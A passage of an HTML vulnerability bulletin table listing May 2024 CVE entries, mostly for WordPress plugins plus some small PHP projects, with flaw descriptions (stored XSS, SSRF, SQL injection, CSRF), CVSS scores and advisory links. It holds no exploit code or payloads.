<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2619" target="_blank">CVE-2024-2619</a><br><a href="https://plugins.trac.wordpress.org/browser/header-footer-elementor/tags/1.6.25/admin/class-hfe-admin.php#L220" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/header-footer-elementor/tags/1.6.25/admin/class-hfe-admin.php#L74" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3070659%40header-footer-elementor%2Ftrunk&amp;old=3053177%40header-footer-elementor%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/689eb95b-2f72-4aa4-9f21-6ae186346061?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>brainstormforce--Starter Templates Elementor, WordPress &amp; Beaver Builder Templates<br> </td>
<td>The Starter Templates - Elementor, WordPress &amp; Beaver Builder Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'custom_upload_mimes' function in versions up to, and including, 4.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4630&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4630" target="_blank">CVE-2024-4630</a><br><a href="https://plugins.trac.wordpress.org/browser/astra-sites/tags/4.2.0/inc/importers/wxr-importer/class-astra-wxr-importer.php#L416" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3084334/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/25edb9e8-65ea-41d1-a95f-09be110ec1d2?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>brainstormforce--Starter Templates Elementor, WordPress &amp; Beaver Builder Templates<br> </td>
<td>The Starter Templates - Elementor, WordPress &amp; Beaver Builder Templates plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.1.6 via the ai_api_request(). This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1467&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1467" target="_blank">CVE-2024-1467</a><br><a href="https://plugins.trac.wordpress.org/changeset/3074863/astra-sites/tags/4.1.7/inc/classes/class-astra-sites-importer.php" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3074863/astra-sites/tags/4.1.7/inc/classes/class-astra-sites.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cf5075f9-9658-4a09-bd38-34a72f6560f4?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>britner--Gutenberg Blocks with AI by Kadence WP Page Builder Features<br> </td>
<td>The Gutenberg Blocks with AI by Kadence WP - Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the typer effect in the advanced heading widget in all versions up to, and including, 3.2.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4208&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4208" target="_blank">CVE-2024-4208</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3084683%40kadence-blocks&amp;new=3084683%40kadence-blocks&amp;sfp_email=&amp;sfph_mail=#file2" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7ea2bb8c-cc8b-49de-9c8e-2c8c0569f4ac?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>britner--Gutenberg Blocks with AI by Kadence WP Page Builder Features<br> </td>
<td>The Gutenberg Blocks with AI by Kadence WP - Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the countdown timer in all versions up to, and including, 3.2.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4209&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4209" target="_blank">CVE-2024-4209</a><br><a href="https://plugins.trac.wordpress.org/browser/kadence-blocks/trunk/includes/blocks/class-kadence-blocks-countdown-block.php" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083616/kadence-blocks/trunk/dist/blocks-countdown.js" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cff2e5be-0de0-4e62-a881-6156760b7d99?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>britner--Gutenberg Blocks with AI by Kadence WP Page Builder Features<br> </td>
<td>The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' attribute of the plugin's blocks in all versions up to, and including, 3.2.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4481&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4481" target="_blank">CVE-2024-4481</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083616/kadence-blocks/trunk/includes/blocks/class-kadence-blocks-advanced-heading-block.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ad0e4292-d890-499b-b70a-ed638d5b8ee9?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>britner--Gutenberg Blocks with AI by Kadence WP Page Builder Features<br> </td>
<td>The Gutenberg Blocks by Kadence Blocks - Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Testimonial', 'Progress Bar', 'Lottie Animations', 'Row Layout', 'Google Maps', and 'Advanced Gallery' blocks in all versions up to, and including, 3.2.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3189&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3189" target="_blank">CVE-2024-3189</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083616/kadence-blocks/trunk/includes/blocks/class-kadence-blocks-lottie-block.php" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3076712%40kadence-blocks&amp;new=3076712%40kadence-blocks&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3084683%40kadence-blocks&amp;new=3084683%40kadence-blocks&amp;sfp_email=&amp;sfph_mail=#file2" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/766b0bde-c555-40c1-b174-20045bd89c11?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>buddypress--BuddyPress<br> </td>
<td>The BuddyPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'user_name' parameter in versions up to, and including, 12.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3974&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3974" target="_blank">CVE-2024-3974</a><br><a href="https://plugins.trac.wordpress.org/browser/buddypress/trunk/bp-members/bp-members-admin.php#L145" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/buddypress/trunk/bp-members/bp-members-blocks.php#L347" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3079691/buddypress" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3657384e-025a-44ad-8b7e-1a2fea17dcc3?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>carazo--Import and export users and customers<br> </td>
<td>The Import and export users and customers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user agent header in all versions up to, and including, 1.26.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4656&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4656" target="_blank">CVE-2024-4656</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3085346%40import-users-from-csv-with-meta%2Ftrunk&amp;old=3078277%40import-users-from-csv-with-meta%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af742451-b2d6-445a-9a10-e950490f6c7c?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>carazo--Import and export users and customers<br> </td>
<td>The Import and export users and customers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.26.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4734&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4734" target="_blank">CVE-2024-4734</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3085346%40import-users-from-csv-with-meta%2Ftrunk&amp;old=3078277%40import-users-from-csv-with-meta%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0dca168f-a383-42fc-91ba-d78a5d7e6724?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>code-projects--Budget Management<br> </td>
<td>A vulnerability classified as critical was found in code-projects Budget Management 1.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument edit leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264745 was assigned to this vulnerability.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5048&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5048" target="_blank">CVE-2024-5048</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/Budget%20Management%20App/Budget%20Management%20App%20-%20SQL%20Injection%20-%201.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264745" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264745" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335666" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>code-projects--Simple Chat System<br> </td>
<td>A vulnerability classified as critical has been found in code-projects Simple Chat System 1.0. This affects an unknown part of the file /login.php. The manipulation of the argument email/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264537 was assigned to this vulnerability.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4972&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4972" target="_blank">CVE-2024-4972</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/Simple%20Chat%20App/Simple%20Chat%20App%20-%20SQL%20Injection%20-%201.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264537" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264537" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335199" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>code-projects--Simple Chat System<br> </td>
<td>A vulnerability classified as critical was found in code-projects Simple Chat System 1.0. This vulnerability affects unknown code of the file /register.php. The manipulation of the argument name/number/address leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264538 is the identifier assigned to this vulnerability.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4973&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4973" target="_blank">CVE-2024-4973</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/Simple%20Chat%20App/Simple%20Chat%20App%20-%20SQL%20Injection%20-%202.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264538" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264538" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335200" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>codename065--Sliding Widgets<br> </td>
<td>Missing Authorization vulnerability in codename065 Sliding Widgets allows Cross-Site Scripting (XSS).This issue affects Sliding Widgets: from n/a through 1.5.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33938&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33938" target="_blank">CVE-2024-33938</a><br><a href="https://patchstack.com/database/vulnerability/sliding-widgets/wordpress-sliding-widgets-plugin-1-5-0-broken-access-control-to-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>codewoogeek--Back In Stock Notifier for WooCommerce | WooCommerce Waitlist Pro<br> </td>
<td>The The Back In Stock Notifier for WooCommerce | WooCommerce Waitlist Pro plugin for WordPress for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.3.1. This is due to the plugin for WordPress allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4038&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4038" target="_blank">CVE-2024-4038</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3080830%40back-in-stock-notifier-for-woocommerce&amp;new=3080830%40back-in-stock-notifier-for-woocommerce&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7f59489-9bff-4d22-8f99-6ea52d702ecf?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>creativethemeshq--Blocksy Companion<br> </td>
<td>The Blocksy Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG uploads in versions up to, and including, 2.0.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4487&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4487" target="_blank">CVE-2024-4487</a><br><a href="https://plugins.trac.wordpress.org/browser/blocksy-companion/tags/2.0.45/framework/features/svg.php#L20" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3084198/#file18" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5208529c-4ac3-42a4-82d0-7f4d2e486236?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>creativethemeshq--Blocksy<br> </td>
<td>The Blocksy theme for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tagName' parameter in versions up to, and including, 2.0.42 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4158&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4158" target="_blank">CVE-2024-4158</a><br><a href="https://themes.trac.wordpress.org/changeset/226440/blocksy" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22d1ccf3-ac1a-4dfc-81c3-b8eb88795bc1?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin<br> </td>
<td>The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' parameter in versions up to, and including, 1.6.7.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4288&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4288" target="_blank">CVE-2024-4288</a><br><a href="https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-shortcodes.php#L677" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3087297/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/84262b4a-a662-4aaf-9eae-f5cca8f6cd06?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>daext--Soccer Engine Soccer Plugin for WordPress<br> </td>
<td>The Soccer Engine - Soccer Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.12. This is due to missing or incorrect nonce validation when saving match and team settings. This makes it possible for unauthenticated attackers to change plugin settings as well as teams, players, etc. via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4312&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4312" target="_blank">CVE-2024-4312</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3081944%40soccer-engine-lite%2Ftrunk&amp;old=3066918%40soccer-engine-lite%2Ftrunk" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/57e84624-98ab-495b-b985-908302527b3a?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>davidanderson--Testimonial Slider<br> </td>
<td>The Testimonial Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'testimonialcategory' shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4193&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4193" target="_blank">CVE-2024-4193</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3080579%40testimonial-slider&amp;new=3080579%40testimonial-slider&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cd7ed687-4049-4957-86e9-b2f59621c747?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>deTheme--DethemeKit For Elementor<br> </td>
<td>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in deTheme DethemeKit For Elementor allows Stored XSS.This issue affects DethemeKit For Elementor: from n/a through 2.1.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34575&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34575" target="_blank">CVE-2024-34575</a><br><a href="https://patchstack.com/database/vulnerability/dethemekit-for-elementor/wordpress-dethemekit-for-elementor-plugin-2-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>detheme--DethemeKit For Elementor<br> </td>
<td>The DethemeKit For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4374&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4374" target="_blank">CVE-2024-4374</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3088000%40dethemekit-for-elementor&amp;new=3088000%40dethemekit-for-elementor&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bcd9384c-5af3-4544-8179-c2f5550dd152?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>devitemsllc--HT Mega Absolute Addons For Elementor<br> </td>
<td>The HT Mega - Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Gallery Justify Widget in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3989&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3989" target="_blank">CVE-2024-3989</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3074490%40ht-mega-for-elementor&amp;new=3074490%40ht-mega-for-elementor&amp;sfp_email=&amp;sfph_mail=#file3" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/03fba6bb-ff30-42bb-936b-93c009a7e3f7?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>devitemsllc--HT Mega Absolute Addons For Elementor<br> </td>
<td>The HT Mega - Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Tooltip &amp; Popover Widget in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3990&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3990" target="_blank">CVE-2024-3990</a><br><a href="https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.5.0/includes/widgets/htmega_tooltip.php#L620" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3074490%40ht-mega-for-elementor&amp;new=3074490%40ht-mega-for-elementor&amp;sfp_email=&amp;sfph_mail=#file4" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3074490%40ht-mega-for-elementor&amp;new=3074490%40ht-mega-for-elementor&amp;sfp_email=&amp;sfph_mail=#file5" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/98e74a23-b586-4d6a-b1ab-78838b0eed61?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>devitemsllc--ShopLentor WooCommerce Builder for Elementor &amp; Gutenberg +12 Modules All in One Solution (formerly WooLentor)<br> </td>
<td>The ShopLentor (formerly WooLentor) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the purchased_new_products function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to view all products purchased in the past week, along with the users that purchased them.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-6327&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
